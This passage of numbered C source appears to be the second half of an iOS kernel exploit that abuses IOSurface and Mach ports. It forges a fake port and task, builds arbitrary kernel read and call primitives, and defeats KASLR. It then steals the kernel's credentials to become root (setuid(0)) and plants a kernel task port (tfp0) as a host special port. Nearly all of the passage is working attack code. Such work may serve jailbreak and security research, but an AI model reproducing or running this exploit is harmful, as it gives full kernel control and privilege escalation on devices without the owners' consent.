  708. for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
  709. {
  710. *(((volatile uint32_t*)&dptr[j].ip_context) + 1) = 0x10000000 | i;
  711. #ifdef __LP64__
  712. *(volatile uint32_t*)&dptr[j].ip_messages.port.pad = 0x20000000 | i;
  713. *(volatile uint32_t*)&dptr[j].ip_lock.pad = 0x30000000 | i;
  714. #endif
  715. }
  716. uint32_t dummy = 0;
  717. size = sizeof(dummy);
  718. ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict, sizeof(dict), &dummy, &size);
  719. if(ret != KERN_SUCCESS)
  720. {
  721. LOG("setValue(%u): %s", i, mach_error_string(ret));
  722. goto out;
  723. }
  724. }
  725. uint64_t ctx = 0xffffffff;
  726. ret = my_mach_port_get_context(self, fakeport, &ctx);
  727. LOG("mach_port_get_context: 0x%016llx, %s", ctx, mach_error_string(ret));
  728. if(ret != KERN_SUCCESS)
  729. {
  730. goto out;
  731. }
  732. uint32_t shift_mask = ctx >> 60;
  733. if(shift_mask < 1 || shift_mask > 3)
  734. {
  735. LOG("Invalid shift mask.");
  736. goto out;
  737. }
  738. uint32_t shift_off = sizeof(kport_t) - (((shift_mask - 1) * 0x1000) % sizeof(kport_t));
  739. uint32_t idx = (ctx >> 32) & 0xfffffff;
  740. dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(idx);
  741. uint32_t request[] =
  742. {
  743. // Same header
  744. surface.data.id,
  745. 0x0,
  746. transpose(idx), // Key
  747. 0x0, // Null terminator
  748. };
  749. kport_t kport =
  750. {
  751. .ip_bits = 0x80000000, // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
  752. .ip_references = 100,
  753. .ip_lock =
  754. {
  755. .type = 0x11,
  756. },
  757. .ip_messages =
  758. {
  759. .port =
  760. {
  761. .receiver_name = 1,
  762. .msgcount = MACH_PORT_QLIMIT_KERNEL,
  763. .qlimit = MACH_PORT_QLIMIT_KERNEL,
  764. },
  765. },
  766. .ip_srights = 99,
  767. };
  768. // Note to self: must be `(uintptr_t)&dict[5] + DATA_SIZE` and not `ptr + DATA_SIZE`.
  769. for(uintptr_t ptr = (uintptr_t)&dict[5] + shift_off, end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  770. {
  771. UNALIGNED_COPY(&kport, ptr, sizeof(kport_t));
  772. }
  773. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  774. LOG("reallocate_buf: %s", mach_error_string(ret));
  775. if(ret != KERN_SUCCESS)
  776. {
  777. goto out;
  778. }
  779. LOG("herp derp fasherp");
  780. usleep(300000);
  781. // Register realport on fakeport
  782. mach_port_t notify = MACH_PORT_NULL;
  783. //XXX: dies here a lot
  784. ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
  785. LOG("mach_port_request_notification(realport): %x, %s", notify, mach_error_string(ret));
  786. if(ret != KERN_SUCCESS)
  787. {
  788. goto out;
  789. }
  790. uint32_t response[4 + (DATA_SIZE / sizeof(uint32_t))] = { 0 };
  791. size = sizeof(response);
  792. ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
  793. LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
  794. if(ret != KERN_SUCCESS)
  795. {
  796. goto out;
  797. }
  798. if(size < DATA_SIZE + 0x10)
  799. {
  800. LOG("Response too short.");
  801. goto out;
  802. }
  803. uint32_t fakeport_off = -1;
  804. kptr_t realport_addr = 0;
  805. for(uintptr_t ptr = (uintptr_t)&response[4] + shift_off, end = (uintptr_t)&response[4] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  806. {
  807. kptr_t val = UNALIGNED_KPTR_DEREF(&((kport_t*)ptr)->ip_pdrequest);
  808. if(val)
  809. {
  810. fakeport_off = ptr - (uintptr_t)&response[4];
  811. realport_addr = val;
  812. break;
  813. }
  814. }
  815. if(!realport_addr)
  816. {
  817. LOG("Failed to leak realport address");
  818. goto out;
  819. }
  820. LOG("realport addr: " ADDR, realport_addr);
  821. uintptr_t fakeport_dictbuf = (uintptr_t)&dict[5] + fakeport_off;
  822. // Register fakeport on itself (and clean ref on realport)
  823. notify = MACH_PORT_NULL;
  824. ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, fakeport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
  825. LOG("mach_port_request_notification(fakeport): %x, %s", notify, mach_error_string(ret));
  826. if(ret != KERN_SUCCESS)
  827. {
  828. goto out;
  829. }
  830. size = sizeof(response);
  831. ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
  832. LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
  833. if(ret != KERN_SUCCESS)
  834. {
  835. goto out;
  836. }
  837. if(size < DATA_SIZE + 0x10)
  838. {
  839. LOG("Response too short.");
  840. goto out;
  841. }
  842. kptr_t fakeport_addr = UNALIGNED_KPTR_DEREF(&((kport_t*)((uintptr_t)&response[4] + fakeport_off))->ip_pdrequest);
  843. if(!fakeport_addr)
  844. {
  845. LOG("Failed to leak fakeport address");
  846. goto out;
  847. }
  848. LOG("fakeport addr: " ADDR, fakeport_addr);
  849. kptr_t fake_addr = fakeport_addr - fakeport_off;
  850. kport_request_t kreq =
  851. {
  852. .notify =
  853. {
  854. .port = 0,
  855. }
  856. };
  857. kport.ip_requests = fakeport_addr + ((uintptr_t)&kport.ip_context - (uintptr_t)&kport) - ((uintptr_t)&kreq.name.size - (uintptr_t)&kreq);
  858. UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
  859. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  860. LOG("reallocate_buf: %s", mach_error_string(ret));
  861. if(ret != KERN_SUCCESS)
  862. {
  863. goto out;
  864. }
  865. #define KREAD(addr, buf, len) \
  866. do \
  867. { \
  868. for(size_t i = 0; i < ((len) + sizeof(uint32_t) - 1) / sizeof(uint32_t); ++i) \
  869. { \
  870. ret = my_mach_port_set_context(self, fakeport, (addr) + i * sizeof(uint32_t)); \
  871. if(ret != KERN_SUCCESS) \
  872. { \
  873. LOG("mach_port_set_context: %s", mach_error_string(ret)); \
  874. goto out; \
  875. } \
  876. mach_msg_type_number_t outsz = 1; \
  877. ret = mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)((uint32_t*)(buf) + i), &outsz); \
  878. if(ret != KERN_SUCCESS) \
  879. { \
  880. LOG("mach_port_get_attributes: %s", mach_error_string(ret)); \
  881. goto out; \
  882. } \
  883. } \
  884. } while(0)
  885. kptr_t itk_space = 0;
  886. KREAD(realport_addr + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &itk_space, sizeof(itk_space));
  887. LOG("itk_space: " ADDR, itk_space);
  888. if(!itk_space)
  889. {
  890. goto out;
  891. }
  892. kptr_t self_task = 0;
  893. KREAD(itk_space + off->ipc_space_is_task, &self_task, sizeof(self_task));
  894. LOG("self_task: " ADDR, self_task);
  895. if(!self_task)
  896. {
  897. goto out;
  898. }
  899. kptr_t IOSurfaceRootUserClient_port = 0;
  900. KREAD(self_task + off->task_itk_registered, &IOSurfaceRootUserClient_port, sizeof(IOSurfaceRootUserClient_port));
  901. LOG("IOSurfaceRootUserClient port: " ADDR, IOSurfaceRootUserClient_port);
  902. if(!IOSurfaceRootUserClient_port)
  903. {
  904. goto out;
  905. }
  906. kptr_t IOSurfaceRootUserClient_addr = 0;
  907. KREAD(IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_kobject - (uintptr_t)&kport), &IOSurfaceRootUserClient_addr, sizeof(IOSurfaceRootUserClient_addr));
  908. LOG("IOSurfaceRootUserClient addr: " ADDR, IOSurfaceRootUserClient_addr);
  909. if(!IOSurfaceRootUserClient_addr)
  910. {
  911. goto out;
  912. }
  913. kptr_t IOSurfaceRootUserClient_vtab = 0;
  914. KREAD(IOSurfaceRootUserClient_addr, &IOSurfaceRootUserClient_vtab, sizeof(IOSurfaceRootUserClient_vtab));
  915. LOG("IOSurfaceRootUserClient vtab: " ADDR, IOSurfaceRootUserClient_vtab);
  916. if(!IOSurfaceRootUserClient_vtab)
  917. {
  918. goto out;
  919. }
  920. //kptr_t slide = IOSurfaceRootUserClient_vtab - OFFSET_IOSURFACEROOTUSERCLIENT_VTAB;
  921. kptr_t slide = IOSurfaceRootUserClient_vtab - 0xfffffff006f11678; //fuck it, just hardcode this bitch for now
  922. LOG("slide: " ADDR, slide);
  923. if((slide % 0x100000) != 0)
  924. {
  925. goto out;
  926. }
  927. // Unregister IOSurfaceRootUserClient port
  928. ret = mach_ports_register(self, NULL, 0);
  929. LOG("mach_ports_register: %s", mach_error_string(ret));
  930. if(ret != KERN_SUCCESS)
  931. {
  932. goto out;
  933. }
  934. kptr_t vtab[VTAB_SIZE] = { 0 };
  935. KREAD(IOSurfaceRootUserClient_vtab, vtab, sizeof(vtab));
  936. kptr_t kbase = (vtab[off->vtab_get_retain_count] & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
  937. for(uint32_t magic = 0; 1; kbase -= KERNEL_SLIDE_STEP)
  938. {
  939. KREAD(kbase, &magic, sizeof(magic));
  940. if(magic == KERNEL_MAGIC)
  941. {
  942. break;
  943. }
  944. }
  945. LOG("Kernel base: " ADDR, kbase);
  946. #define OFF(name) (off->name + (kbase - off->base))
  947. kptr_t zone_map_addr = 0;
  948. KREAD(OFF(zone_map), &zone_map_addr, sizeof(zone_map_addr));
  949. LOG("zone_map: " ADDR, zone_map_addr);
  950. if(!zone_map_addr)
  951. {
  952. goto out;
  953. }
  954. #ifdef __LP64__
  955. vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_x0_x0_0x10);
  956. #else
  957. vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_r0_r0_0xc);
  958. #endif
  959. uint32_t faketask_off = fakeport_off < sizeof(ktask_t) ? fakeport_off + sizeof(kport_t) : 0;
  960. faketask_off = UINT64_ALIGN(faketask_off);
  961. uintptr_t faketask_buf = (uintptr_t)&dict[5] + faketask_off;
  962. ktask_t ktask;
  963. memset(&ktask, 0, sizeof(ktask));
  964. ktask.a.lock.data = 0x0;
  965. ktask.a.lock.type = 0x22;
  966. ktask.a.ref_count = 100;
  967. ktask.a.active = 1;
  968. ktask.a.map = zone_map_addr;
  969. ktask.b.itk_self = 1;
  970. UNALIGNED_COPY(&ktask, faketask_buf, sizeof(ktask));
  971. kport.ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
  972. kport.ip_kobject = fake_addr + faketask_off;
  973. kport.ip_requests = 0;
  974. kport.ip_context = 0;
  975. UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
  976. #undef KREAD
  977. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  978. LOG("reallocate_buf: %s", mach_error_string(ret));
  979. if(ret != KERN_SUCCESS)
  980. {
  981. goto out;
  982. }
  983. vm_prot_t cur = 0,
  984. max = 0;
  985. sched_yield();
  986. ret = mach_vm_remap(self, &shmem_addr, DATA_SIZE, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);
  987. if(ret != KERN_SUCCESS)
  988. {
  989. LOG("mach_vm_remap: %s", mach_error_string(ret));
  990. goto out;
  991. }
  992. *(uint32_t*)shmem_addr = 123; // fault page
  993. LOG("shmem_addr: 0x%016llx", shmem_addr);
  994. volatile kport_t *fakeport_buf = (volatile kport_t*)(shmem_addr + fakeport_off);
  995. uint32_t vtab_off = fakeport_off < sizeof(vtab) ? fakeport_off + sizeof(kport_t) : 0;
  996. vtab_off = UINT64_ALIGN(vtab_off);
  997. kptr_t vtab_addr = fake_addr + vtab_off;
  998. LOG("vtab addr: " ADDR, vtab_addr);
  999. volatile kptr_t *vtab_buf = (volatile kptr_t*)(shmem_addr + vtab_off);
  1000. for(volatile kptr_t *src = vtab, *dst = vtab_buf, *end = src + VTAB_SIZE; src < end; *(dst++) = *(src++));
  1001. #define MAXRANGES 5
  1002. struct
  1003. {
  1004. uint32_t start;
  1005. uint32_t end;
  1006. } ranges[MAXRANGES] =
  1007. {
  1008. { fakeport_off, (uint32_t)(fakeport_off + sizeof(kport_t)) },
  1009. { vtab_off, (uint32_t)(vtab_off + sizeof(vtab)) },
  1010. };
  1011. size_t numranges = 2;
  1012. #define FIND_RANGE(var, size) \
  1013. do \
  1014. { \
  1015. if(numranges >= MAXRANGES) \
  1016. { \
  1017. LOG("FIND_RANGE(" #var "): ranges array too small"); \
  1018. goto out; \
  1019. } \
  1020. for(int32_t i = 0; i < numranges; ++i) \
  1021. { \
  1022. uint32_t end = var + (uint32_t)(size); \
  1023. if( \
  1024. (var >= ranges[i].start && var < ranges[i].end) || \
  1025. (end >= ranges[i].start && var < ranges[i].end) \
  1026. ) \
  1027. { \
  1028. var = UINT64_ALIGN(ranges[i].end); \
  1029. i = -1; \
  1030. } \
  1031. } \
  1032. if(var + (uint32_t)(size) > DATA_SIZE) \
  1033. { \
  1034. LOG("FIND_RANGE(" #var ") out of range: 0x%x-0x%x", var, var + (uint32_t)(size)); \
  1035. goto out; \
  1036. } \
  1037. ranges[numranges].start = var; \
  1038. ranges[numranges].end = var + (uint32_t)(size); \
  1039. ++numranges; \
  1040. } while(0)
  1041. typedef union
  1042. {
  1043. struct {
  1044. // IOUserClient fields
  1045. kptr_t vtab;
  1046. uint32_t refs;
  1047. uint32_t pad;
  1048. // Gadget stuff
  1049. kptr_t trap_ptr;
  1050. // IOExternalTrap fields
  1051. kptr_t obj;
  1052. kptr_t func;
  1053. uint32_t break_stuff; // idk wtf this field does, but it has to be zero or iokit_user_client_trap does some weird pointer mashing
  1054. // OSSerializer::serialize
  1055. kptr_t indirect[3];
  1056. } a;
  1057. struct {
  1058. char pad[OFFSET_IOUSERCLIENT_IPC];
  1059. int32_t __ipc;
  1060. } b;
  1061. } kobj_t;
  1062. uint32_t fakeobj_off = 0;
  1063. FIND_RANGE(fakeobj_off, sizeof(kobj_t));
  1064. kptr_t fakeobj_addr = fake_addr + fakeobj_off;
  1065. LOG("fakeobj addr: " ADDR, fakeobj_addr);
  1066. volatile kobj_t *fakeobj_buf = (volatile kobj_t*)(shmem_addr + fakeobj_off);
  1067. VOLATILE_ZERO(fakeobj_buf, sizeof(kobj_t));
  1068. fakeobj_buf->a.vtab = vtab_addr;
  1069. fakeobj_buf->a.refs = 100;
  1070. fakeobj_buf->a.trap_ptr = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.obj - (uintptr_t)fakeobj_buf);
  1071. fakeobj_buf->a.break_stuff = 0;
  1072. fakeobj_buf->b.__ipc = 100;
  1073. fakeport_buf->ip_bits = 0x8000001d; // IO_BITS_ACTIVE | IOT_PORT | IKOT_IOKIT_CONNECT
  1074. fakeport_buf->ip_kobject = fakeobj_addr;
  1075. // First arg to KCALL can't be == 0, so we need KCALL_ZERO which indirects through OSSerializer::serialize.
  1076. // That way it can take way less arguments, but well, it can pass zero as first arg.
  1077. #define KCALL(addr, x0, x1, x2, x3, x4, x5, x6) \
  1078. ( \
  1079. fakeobj_buf->a.obj = (kptr_t)(x0), \
  1080. fakeobj_buf->a.func = (kptr_t)(addr), \
  1081. (kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x1), (kptr_t)(x2), (kptr_t)(x3), (kptr_t)(x4), (kptr_t)(x5), (kptr_t)(x6)) \
  1082. )
  1083. #define KCALL_ZERO(addr, x0, x1, x2) \
  1084. ( \
  1085. fakeobj_buf->a.obj = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.indirect - (uintptr_t)fakeobj_buf) - 2 * sizeof(kptr_t), \
  1086. fakeobj_buf->a.func = OFF(osserializer_serialize), \
  1087. fakeobj_buf->a.indirect[0] = (x0), \
  1088. fakeobj_buf->a.indirect[1] = (x1), \
  1089. fakeobj_buf->a.indirect[2] = (addr), \
  1090. (kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x2), 0, 0, 0, 0, 0) \
  1091. )
  1092. kptr_t kernel_task_addr = 0;
  1093. int r = KCALL(OFF(copyout), OFF(kernel_task), &kernel_task_addr, sizeof(kernel_task_addr), 0, 0, 0, 0);
  1094. LOG("kernel_task addr: " ADDR ", %s, %s", kernel_task_addr, errstr(r), mach_error_string(r));
  1095. if(r != 0 || !kernel_task_addr)
  1096. {
  1097. goto out;
  1098. }
  1099. kptr_t kernproc_addr = 0;
  1100. r = KCALL(OFF(copyout), kernel_task_addr + off->task_bsd_info, &kernproc_addr, sizeof(kernproc_addr), 0, 0, 0, 0);
  1101. LOG("kernproc addr: " ADDR ", %s, %s", kernproc_addr, errstr(r), mach_error_string(r));
  1102. if(r != 0 || !kernproc_addr)
  1103. {
  1104. goto out;
  1105. }
  1106. kptr_t kern_ucred = 0;
  1107. r = KCALL(OFF(copyout), kernproc_addr + off->proc_ucred, &kern_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
  1108. LOG("kern_ucred: " ADDR ", %s, %s", kern_ucred, errstr(r), mach_error_string(r));
  1109. if(r != 0 || !kern_ucred)
  1110. {
  1111. goto out;
  1112. }
  1113. kptr_t self_proc = 0;
  1114. r = KCALL(OFF(copyout), self_task + off->task_bsd_info, &self_proc, sizeof(self_proc), 0, 0, 0, 0);
  1115. LOG("self_proc: " ADDR ", %s, %s", self_proc, errstr(r), mach_error_string(r));
  1116. if(r != 0 || !self_proc)
  1117. {
  1118. goto out;
  1119. }
  1120. kptr_t self_ucred = 0;
  1121. r = KCALL(OFF(copyout), self_proc + off->proc_ucred, &self_ucred, sizeof(self_ucred), 0, 0, 0, 0);
  1122. LOG("self_ucred: " ADDR ", %s, %s", self_ucred, errstr(r), mach_error_string(r));
  1123. if(r != 0 || !self_ucred)
  1124. {
  1125. goto out;
  1126. }
  1127. int olduid = getuid();
  1128. LOG("uid: %u", olduid);
  1129. KCALL(OFF(kauth_cred_ref), kern_ucred, 0, 0, 0, 0, 0, 0);
  1130. r = KCALL(OFF(copyin), &kern_ucred, self_proc + off->proc_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
  1131. LOG("copyin: %s", errstr(r));
  1132. if(r != 0 || !self_ucred)
  1133. {
  1134. goto out;
  1135. }
  1136. // Note: decreasing the refcount on the old cred causes a panic with "cred reference underflow", so... don't do that.
  1137. LOG("stole the kernel's credentials");
  1138. setuid(0); // update host port
  1139. int newuid = getuid();
  1140. LOG("uid: %u", newuid);
  1141. if(newuid != olduid)
  1142. {
  1143. KCALL_ZERO(OFF(chgproccnt), newuid, 1, 0);
  1144. KCALL_ZERO(OFF(chgproccnt), olduid, -1, 0);
  1145. }
  1146. host_t realhost = mach_host_self();
  1147. LOG("realhost: %x (host: %x)", realhost, host);
  1148. uint32_t zm_task_off = 0;
  1149. FIND_RANGE(zm_task_off, sizeof(ktask_t));
  1150. kptr_t zm_task_addr = fake_addr + zm_task_off;
  1151. LOG("zm_task addr: " ADDR, zm_task_addr);
  1152. volatile ktask_t *zm_task_buf = (volatile ktask_t*)(shmem_addr + zm_task_off);
  1153. VOLATILE_ZERO(zm_task_buf, sizeof(ktask_t));
  1154. zm_task_buf->a.lock.data = 0x0;
  1155. zm_task_buf->a.lock.type = 0x22;
  1156. zm_task_buf->a.ref_count = 100;
  1157. zm_task_buf->a.active = 1;
  1158. zm_task_buf->b.itk_self = 1;
  1159. zm_task_buf->a.map = zone_map_addr;
  1160. uint32_t km_task_off = 0;
  1161. FIND_RANGE(km_task_off, sizeof(ktask_t));
  1162. kptr_t km_task_addr = fake_addr + km_task_off;
  1163. LOG("km_task addr: " ADDR, km_task_addr);
  1164. volatile ktask_t *km_task_buf = (volatile ktask_t*)(shmem_addr + km_task_off);
  1165. VOLATILE_ZERO(km_task_buf, sizeof(ktask_t));
  1166. km_task_buf->a.lock.data = 0x0;
  1167. km_task_buf->a.lock.type = 0x22;
  1168. km_task_buf->a.ref_count = 100;
  1169. km_task_buf->a.active = 1;
  1170. km_task_buf->b.itk_self = 1;
  1171. r = KCALL(OFF(copyout), OFF(kernel_map), &km_task_buf->a.map, sizeof(km_task_buf->a.map), 0, 0, 0, 0);
  1172. LOG("kernel_map: " ADDR ", %s", km_task_buf->a.map, errstr(r));
  1173. if(r != 0 || !km_task_buf->a.map)
  1174. {
  1175. goto out;
  1176. }
  1177. kptr_t ipc_space_kernel = 0;
  1178. r = KCALL(OFF(copyout), IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &ipc_space_kernel, sizeof(ipc_space_kernel), 0, 0, 0, 0);
  1179. LOG("ipc_space_kernel: " ADDR ", %s", ipc_space_kernel, errstr(r));
  1180. if(r != 0 || !ipc_space_kernel)
  1181. {
  1182. goto out;
  1183. }
  1184. #ifdef __LP64__
  1185. kmap_hdr_t zm_hdr = { 0 };
  1186. r = KCALL(OFF(copyout), zm_task_buf->a.map + off->vm_map_hdr, &zm_hdr, sizeof(zm_hdr), 0, 0, 0, 0);
  1187. LOG("zm_range: " ADDR "-" ADDR ", %s", zm_hdr.start, zm_hdr.end, errstr(r));
  1188. if(r != 0 || !zm_hdr.start || !zm_hdr.end)
  1189. {
  1190. goto out;
  1191. }
  1192. if(zm_hdr.end - zm_hdr.start > 0x100000000)
  1193. {
  1194. LOG("zone_map is too big, sorry.");
  1195. goto out;
  1196. }
  1197. kptr_t zm_tmp = 0; // macro scratch space
  1198. # define ZM_FIX_ADDR(addr) \
  1199. ( \
  1200. zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff), \
  1201. zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp \
  1202. )
  1203. #else
  1204. # define ZM_FIX_ADDR(addr) (addr)
  1205. #endif
  1206. kptr_t ptrs[2] = { 0 };
  1207. ptrs[0] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1208. ptrs[1] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1209. LOG("zm_port addr: " ADDR, ptrs[0]);
  1210. LOG("km_port addr: " ADDR, ptrs[1]);
  1211. KCALL(OFF(ipc_kobject_set), ptrs[0], zm_task_addr, IKOT_TASK, 0, 0, 0, 0);
  1212. KCALL(OFF(ipc_kobject_set), ptrs[1], km_task_addr, IKOT_TASK, 0, 0, 0, 0);
  1213. r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
  1214. LOG("copyin: %s", errstr(r));
  1215. if(r != 0)
  1216. {
  1217. goto out;
  1218. }
  1219. mach_msg_type_number_t mapsNum = 0;
  1220. ret = mach_ports_lookup(self, &maps, &mapsNum);
  1221. LOG("mach_ports_lookup: %s", mach_error_string(ret));
  1222. if(ret != KERN_SUCCESS)
  1223. {
  1224. goto out;
  1225. }
  1226. LOG("zone_map port: %x", maps[0]);
  1227. LOG("kernel_map port: %x", maps[1]);
  1228. if(!MACH_PORT_VALID(maps[0]) || !MACH_PORT_VALID(maps[1]))
  1229. {
  1230. goto out;
  1231. }
  1232. // Clean out the pointers without dropping refs
  1233. ptrs[0] = ptrs[1] = 0;
  1234. r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
  1235. LOG("copyin: %s", errstr(r));
  1236. if(r != 0)
  1237. {
  1238. goto out;
  1239. }
  1240. mach_vm_address_t remap_addr = 0;
  1241. ret = mach_vm_remap(maps[1], &remap_addr, off->sizeof_task, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, maps[0], kernel_task_addr, false, &cur, &max, VM_INHERIT_NONE);
  1242. LOG("mach_vm_remap: %s", mach_error_string(ret));
  1243. if(ret != KERN_SUCCESS)
  1244. {
  1245. goto out;
  1246. }
  1247. LOG("remap_addr: 0x%016llx", remap_addr);
  1248. ret = mach_vm_wire(realhost, maps[1], remap_addr, off->sizeof_task, VM_PROT_READ | VM_PROT_WRITE);
  1249. LOG("mach_vm_wire: %s", mach_error_string(ret));
  1250. if(ret != KERN_SUCCESS)
  1251. {
  1252. goto out;
  1253. }
  1254. kptr_t newport = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1255. LOG("newport: " ADDR, newport);
  1256. KCALL(OFF(ipc_kobject_set), newport, remap_addr, IKOT_TASK, 0, 0, 0, 0);
  1257. KCALL(OFF(ipc_port_make_send), newport, 0, 0, 0, 0, 0, 0);
  1258. r = KCALL(OFF(copyin), &newport, OFF(realhost) + off->realhost_special + sizeof(kptr_t) * 4, sizeof(kptr_t), 0, 0, 0, 0);
  1259. LOG("copyin: %s", errstr(r));
  1260. if(r != 0)
  1261. {
  1262. goto out;
  1263. }
  1264. task_t kernel_task = MACH_PORT_NULL;
  1265. ret = host_get_special_port(realhost, HOST_LOCAL_NODE, 4, &kernel_task);
  1266. LOG("kernel_task: %x, %s", kernel_task, mach_error_string(ret));
  1267. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(kernel_task))
  1268. {
  1269. goto out;
  1270. }
  1271. /*
  1272. if(callback)
  1273. {
  1274. ret = callback(kernel_task, kbase, cb_data);
  1275. if(ret != KERN_SUCCESS)
  1276. {
  1277. LOG("callback returned error: %s", mach_error_string(ret));
  1278. goto out;
  1279. }
  1280. }
  1281. */
  1282. *tfp0 = kernel_task;
  1283. *kslide = slide;
  1284. *kernucred = kern_ucred;
  1285. retval = KERN_SUCCESS;
  1286. out:;
  1287. LOG("Cleaning up...");
  1288. usleep(100000); // Allow logs to propagate
  1289. if(maps)
  1290. {
  1291. RELEASE_PORT(maps[0]);
  1292. RELEASE_PORT(maps[1]);
  1293. }
  1294. RELEASE_PORT(fakeport);
  1295. for(size_t i = 0; i < NUM_AFTER; ++i)
  1296. {
  1297. RELEASE_PORT(after[i]);
  1298. }
  1299. RELEASE_PORT(port);
  1300. for(size_t i = 0; i < NUM_BEFORE; ++i)
  1301. {
  1302. RELEASE_PORT(before[i]);
  1303. }
  1304. RELEASE_PORT(realport);
  1305. RELEASE_PORT(stuffport);
  1306. RELEASE_PORT(client);
  1307. my_mach_zone_force_gc(host);
  1308. if(shmem_addr != 0)
  1309. {
  1310. _kernelrpc_mach_vm_deallocate_trap(self, shmem_addr, DATA_SIZE);
  1311. shmem_addr = 0;
  1312. }
  1313. // Pass through error code, if existent
  1314. if(retval != KERN_SUCCESS && ret != KERN_SUCCESS)
  1315. {
  1316. retval = ret;
  1317. }
  1318. return retval;
  1319. }